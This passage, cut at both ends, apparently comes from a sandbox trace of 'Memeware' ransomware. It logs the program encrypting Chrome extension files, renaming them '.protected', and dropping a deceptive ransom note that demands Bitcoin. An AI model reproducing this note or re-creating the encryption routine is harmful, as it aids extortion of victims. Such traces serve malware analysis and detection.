pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json") returned 159 [0080.047] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.047] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.047] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.047] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json") returned 159 [0080.048] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json") returned 159 [0080.048] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json") returned 159 [0080.048] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.048] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.049] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.049] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.049] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.049] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.049] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.049] CloseHandle (hObject=0x168) returned 1 [0080.049] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.protected") returned 169 [0080.049] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0080.050] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.050] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.050] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 163 [0080.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.050] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.050] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.051] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.051] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.051] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.051] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.051] CloseHandle (hObject=0x164) returned 1 [0080.051] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.051] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0080.051] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0080.051] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0080.051] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0080.051] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0080.051] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et") returned 141 [0080.051] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0080.051] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0080.051] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\*") returned 143 [0080.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.051] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.051] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.051] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.051] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.051] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.051] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\.") returned 143 [0080.051] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.051] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.051] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.051] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.051] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.052] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.052] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\..") returned 144 [0080.052] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.052] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.052] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.052] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.052] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.052] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.052] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.052] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.052] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json") returned 155 [0080.052] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.052] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.052] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.052] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json") returned 155 [0080.052] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json") returned 155 [0080.052] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json") returned 155 [0080.052] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.052] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.053] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.053] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.053] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.053] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.053] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.053] CloseHandle (hObject=0x168) returned 1 [0080.053] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.protected") returned 165 [0080.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.protected")) returned 1 [0080.054] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.054] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.054] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\RESTORE_FILES.txt") returned 159 [0080.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.054] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.054] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.055] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.055] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.055] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.055] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.055] CloseHandle (hObject=0x164) returned 1 [0080.055] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.055] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0080.055] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0080.055] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0080.055] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0080.055] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0080.055] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi") returned 141 [0080.055] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0080.055] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0080.055] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\*") returned 143 [0080.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.056] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.056] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.056] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.056] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.056] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.056] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\.") returned 143 [0080.056] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.056] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.056] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.056] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.056] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.056] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.056] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.056] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\..") returned 144 [0080.056] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.056] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.056] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.056] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.056] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.056] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.056] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.056] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.056] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json") returned 155 [0080.056] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.056] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.056] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.056] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: 